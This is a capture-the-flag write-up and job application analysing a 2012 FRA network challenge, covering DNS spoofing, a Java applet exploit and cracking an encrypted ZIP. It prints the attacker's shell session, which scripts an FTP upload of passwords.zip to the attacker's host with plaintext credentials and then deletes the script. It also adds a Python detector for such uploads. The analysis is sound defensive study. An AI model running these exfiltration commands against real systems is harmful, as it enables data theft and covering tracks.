
THE NATIONAL RADIO DEFENCE ESTABLISHMENT:

NETWORK ANALYSIS

DANIEL BERAVI

2012
Network Challenge: Suspicious Network Traffic

Table of Contents
What is this?
Security Toolset
Approach & Solution
  The Pattern of the Attack
  Vulnerability Exploitation
  Encrypted ZIP
Appendices
  Appendix A
  Appendix B
  Appendix C
  Appendix D
  Appendix E

What is this?
This is a presentation and job application to the Swedish Radio Defense Establishment. It contains an
analysis of the third public challenge, previously available on their website.

Security Toolset
Operating System: Windows 7 Professional
Protocol Analyzer A: Wireshark 1.6.8
Protocol Analyzer B: NetworkMiner 1.4.1
Zip Cracker: Accessdata PRTK 6.6.1*
Java Decompiler: JD-GUI 0.3.5
*A legally licensed copy, provided by CS2Lab at Stockholm University, was used

Approach & Solution


NetworkMiner gave me a good overview of the traffic in structured form: sessions, files, credentials etc. I used this
overview when I followed the traffic in Wireshark.

The Pattern of the Attack


At the beginning of the captured data there is DNS traffic which makes it look as if 192.168.58.140 is spoofing
the site FRA.se on IP 192.168.58.141.
The user visited the site and somehow (it was unclear how, because there was no HTTP referrer) ended up on
the page with the malicious applet; the applet code then ran. The Java applet code calls back to the attacker
machine and they establish a telnet connection through which the attacker enters the FTP commands. The
victim was thus connected to the attacker, who got a remote shell and used FTP commands to upload the
ZIP from the victim to the FTP server.
The FTP credentials were:
Username: ftpuser
Password: simple

Vulnerability Exploitation
I found the Happy Applet. The Happy Applet exploits the browser's security if it is executed. In this case, a
shell script, described later, was executed. By decompiling the shell exploit I also found the commands used.
They are shown in Appendix E and are:

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.


C:\Documents and Settings\user\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 7CEE-1527
Directory of C:\Documents and Settings\user\Desktop
2012-04-12 07:50 <DIR> .
2012-04-12 07:50 <DIR> ..
2010-07-23 17:39 2.839 CHANGELOG.txt
2008-02-16 14:58 1.711 Command Prompt.lnk
2008-09-04 17:07 1.308 Cygwin Bash Shell.lnk
2008-02-16 14:51 574 LogFiles.lnk
2012-04-12 10:04 83.150 passwords.zip
5 File(s) 89.582 bytes
2 Dir(s) 4.256.501.760 bytes free
C:\Documents and Settings\user\Desktop>echo USER ftpuser>cmds.txt
echo USER ftpuser>cmds.txt
C:\Documents and Settings\user\Desktop>echo simple>>cmds.txt
echo simple>>cmds.txt
C:\Documents and Settings\user\Desktop>echo PUT passwords.zip>>cmds.txt
echo PUT passwords.zip>>cmds.txt
C:\Documents and Settings\user\Desktop>echo BYE>>cmds.txt
echo BYE>>cmds.txt
C:\Documents and Settings\user\Desktop>ftp -n -s:cmds.txt 192.168.58.140
ftp -n -s:cmds.txt 192.168.58.140
USER ftpuser
PUT passwords.zip
BYE
C:\Documents and Settings\user\Desktop>del cmds.txt
del cmds.txt
C:\Documents and Settings\user\Desktop>exit
The attack was sent from IP
I exported the .Jar exploit (FRAME 2816 and 2859) and renamed it to .Jar format. Then I made a quick analysis of
it in the JD-GUI (Java) decompiler, and thanks to Google I found further information:

http://schierlm.users.sourceforge.net/CVE-2011-3544.html
http://www.metasploit.com/modules/exploit/multi/browser/java_rhino
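As an added example (not part of the original analysis), the following Python reconstructs the scripted FTP upload from the shell transcript above: it rebuilds the command file assembled with `echo ... >>cmds.txt`, pairs it with the `ftp -n -s:` invocation, and reports the server, credentials and uploaded file so an analyst can confirm what left the host. The transcript sample is copied from the session quoted in this report; the function names and the reconstruction logic are this example's own.

```python
import re

# Constructed sample: the prompt lines of the captured shell session quoted in this write-up.
TRANSCRIPT = """\
C:\\Documents and Settings\\user\\Desktop>echo USER ftpuser>cmds.txt
C:\\Documents and Settings\\user\\Desktop>echo simple>>cmds.txt
C:\\Documents and Settings\\user\\Desktop>echo PUT passwords.zip>>cmds.txt
C:\\Documents and Settings\\user\\Desktop>echo BYE>>cmds.txt
C:\\Documents and Settings\\user\\Desktop>ftp -n -s:cmds.txt 192.168.58.140
"""
PROMPT_RE = re.compile(r"^[A-Za-z]:\\[^>]*>(.*)$")   # "C:\...>command" -> command
ECHO_RE = re.compile(r"^echo (.*?)(>>|>)\s*(\S+)$")  # echo TEXT>file or echo TEXT>>file

def commands(transcript):
    """Return the command typed at each cmd.exe prompt, in order."""
    return [m.group(1).strip() for m in map(PROMPT_RE.match, transcript.splitlines()) if m]

def rebuild_echoed_files(transcript):
    """Reassemble files built with echo redirection: `>` truncates, `>>` appends."""
    files = {}
    for cmd in commands(transcript):
        e = ECHO_RE.match(cmd)
        if e:
            text, op, name = e.groups()
            if op == ">":
                files[name] = []
            files.setdefault(name, []).append(text)
    return files

def find_ftp_exfil(transcript):
    """Pair each `ftp -s:<script> <host>` with its rebuilt script; report server, credentials, uploads."""
    scripts, findings = rebuild_echoed_files(transcript), []
    for cmd in commands(transcript):
        args = cmd.split()
        script = next((a[3:] for a in args[1:] if a.startswith("-s:")), None)
        hosts = [a for a in args[1:] if not a.startswith("-")]
        if not args or args[0].lower() != "ftp" or script is None or not hosts:
            continue
        info = {"server": hosts[-1], "script": script, "user": None, "password": None, "uploads": []}
        lines = scripts.get(script, [])
        for i, ftp_line in enumerate(lines):
            verb, _, arg = ftp_line.strip().partition(" ")
            if verb.upper() == "USER" and arg:
                info["user"], _, pw = arg.partition(" ")
                # ftp -n: a password not given on the USER line is read from the next script line.
                info["password"] = pw or (lines[i + 1] if i + 1 < len(lines) else None)
            elif verb.upper() in ("PUT", "SEND") and arg:
                info["uploads"].append(arg)
        findings.append(info)
    return findings
```

The same parser runs over any cmd.exe transcript recovered from a reverse-shell channel, and a non-empty result is a direct indicator that a file was staged for scripted FTP upload.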

Encrypted ZIP
I exported the ZIP archive (FRAME 5422) from Wireshark to my desktop and loaded it in PRTK. It was
cracked in a few seconds and the output (Appendix D) was FRA. The decrypted PDF had the following
text:

Congratulations!
Send us your CV and, in the cover letter, describe your approach and explain what happens in the
network traffic.

Appendices
Appendix A

Appendix B

Appendix C

Appendix D

Appendix E
